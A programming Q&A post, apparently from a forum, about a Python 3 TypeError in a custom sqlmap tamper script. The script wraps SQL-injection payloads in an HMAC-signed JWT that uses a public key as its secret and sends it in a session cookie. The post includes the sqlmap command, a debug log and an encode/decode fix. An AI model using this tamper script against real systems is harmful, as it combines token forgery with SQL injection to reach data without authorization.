Custom sqlmap tamper script giving error: `bytes-like object is required, not 'str'`

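I am trying to write a tamper script for sqlmap that wraps my payload in a JSON Web Token (JWT) and sends it in the session cookie. However, when I try to run my tamper script in sqlmap via:

```
sqlmap -u "http://example.com/" --cookie="session=*" --tamper="plain2jwt.py" -v 3
```

I get the following error/output: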

```
[10:37:13] [DEBUG] cleaning up configuration parameters
[10:37:13] [INFO] loading tamper module 'plain2jwt'
[10:37:13] [DEBUG] setting the HTTP timeout
[10:37:13] [DEBUG] setting the HTTP Cookie header
[10:37:13] [DEBUG] setting the HTTP User-Agent header
[10:37:13] [DEBUG] creating HTTP requests opener object
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
[10:37:20] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:37:20] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:37:20] [DEBUG] resolving hostname 'example.com'
[10:37:20] [INFO] testing connection to the target URL
[10:37:21] [DEBUG] declared web page charset 'utf-8'
[10:37:21] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[10:37:21] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[10:37:21] [INFO] testing if the target URL content is stable
[10:37:21] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[10:37:21] [INFO] target URL content is stable
[10:37:21] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
[10:37:21] [CRITICAL] error occurred while running tamper function 'plain2jwt' ('TypeError: a bytes-like object is required, not 'str'')
[10:37:21] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
```

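I'm not sure what is causing this error, since I don't get any errors when I run the script standalone, and other tamper scripts seem to return strings rather than bytes-like objects. I even tried encoding my output, but that doesn't seem to help. My tamper script is as follows: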

```python
#!/usr/bin/env python

import hmac
import hashlib
import base64
import json
import imp
enums = imp.load_source("lib.core.enums", "/usr/share/sqlmap/lib/core/enums.py")

__priority__ = enums.PRIORITY.NORMAL

def tamper(payload, **kwargs):
    '''
    '''
    header = {
            "alg":"HS256",
            "typ":"JWT"
    }
    payload = {
            "username":payload,
            "pk":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\n0wIDAQAB\n-----END PUBLIC KEY-----\n",
            "iat":"1583764126"
    }

    key = "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA95oTm9DNzcHr8gLhjZaY\nktsbj1KxxUOozw0trP93BgIpXv6WipQRB5lqofPlU6FB99Jc5QZ0459t73ggVDQi\nXuCMI2hoUfJ1VmjNeWCrSrDUhokIFZEuCumehwwtUNuEv0ezC54ZTdEC5YSTAOzg\njIWalsHj/ga5ZEDx3Ext0Mh5AEwbAD73+qXS/uCvhfajgpzHGd9OgNQU60LMf2mH\n+FynNsjNNwo5nRe7tR12Wb2YOCxw2vdamO1n1kf/SMypSKKvOgj5y0LGiU3jeXMx\nV8WS+YiYCU5OBAmTcz2w2kzBhZFlH6RK4mquexJHra23IGv5UJ5GVPEXpdCqK3Tr\n0wIDAQAB\n-----END PUBLIC KEY-----\n"
    unsigned_token = base64.b64encode(json.dumps(header)).strip('=') + '.' + base64.b64encode(json.dumps(payload)).strip('=')
    signature = hmac.new(key, unsigned_token, hashlib.sha256)
    token = unsigned_token + '.' + base64.b64encode(signature.hexdigest()).strip('=')
    return token if payload else payload
```

Any idea what is causing this? Thanks!

`base64.b64encode` takes a bytes-like object as its argument, so you have to encode your string first. The same goes for `hmac.new`.

So you could do, for example:

```python
unsigned_token = base64.b64encode(json.dumps(header).encode('utf-8')).strip(b'=') + b'.' + base64.b64encode(json.dumps(payload).encode('utf-8')).strip(b'=')
signature = hmac.new(key.encode('utf-8'), unsigned_token, hashlib.sha256)
token = unsigned_token + b'.' + base64.b64encode(signature.hexdigest().encode('utf-8')).strip(b'=')
```

Then, as the OP pointed out, `tamper` needs to return a string, so in the end you have to decode the bytes back to `str`, for example:

```python
return token.decode('utf-8')
```
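
The failure and the encode/decode pattern from the answer above, reproduced outside sqlmap as an added example (not code from the question or the answer). The helper names `to_bytes`, `b64_text`, `hmac_sha256_hex` and `raises_type_error`, and the sample key and JSON, are constructed for illustration; the block shows that the `TypeError` comes from the Python 3 standard-library calls themselves, and keeps bytes inside the helpers with `str` at the boundary.

```python
import base64
import hashlib
import hmac
import json


def to_bytes(value, encoding="utf-8"):
    """Accept str or bytes and always hand bytes to the stdlib call."""
    if isinstance(value, (bytes, bytearray)):
        return value
    return value.encode(encoding)


def b64_text(value):
    """Base64-encode str or bytes and return str, with '=' padding stripped
    the same way the script on this page strips it."""
    return base64.b64encode(to_bytes(value)).decode("ascii").rstrip("=")


def hmac_sha256_hex(key, message):
    """HMAC-SHA256 over str or bytes inputs; hexdigest() already returns str."""
    return hmac.new(to_bytes(key), to_bytes(message), hashlib.sha256).hexdigest()


def raises_type_error(func, *args):
    """Return True when func(*args) raises TypeError, False otherwise."""
    try:
        func(*args)
    except TypeError:
        return True
    return False


# Constructed sample values, not taken from the page.
SAMPLE_JSON = json.dumps({"username": "alice"})
SAMPLE_KEY = "constructed-demo-key"

if __name__ == "__main__":
    # The same kind of calls as in the question: str arguments fail on Python 3.
    print(raises_type_error(base64.b64encode, SAMPLE_JSON))
    print(raises_type_error(hmac.new, SAMPLE_KEY, SAMPLE_JSON, hashlib.sha256))
    # Through the helpers: bytes internally, str returned to the caller.
    print(b64_text(SAMPLE_JSON))
    print(hmac_sha256_hex(SAMPLE_KEY, SAMPLE_JSON))
```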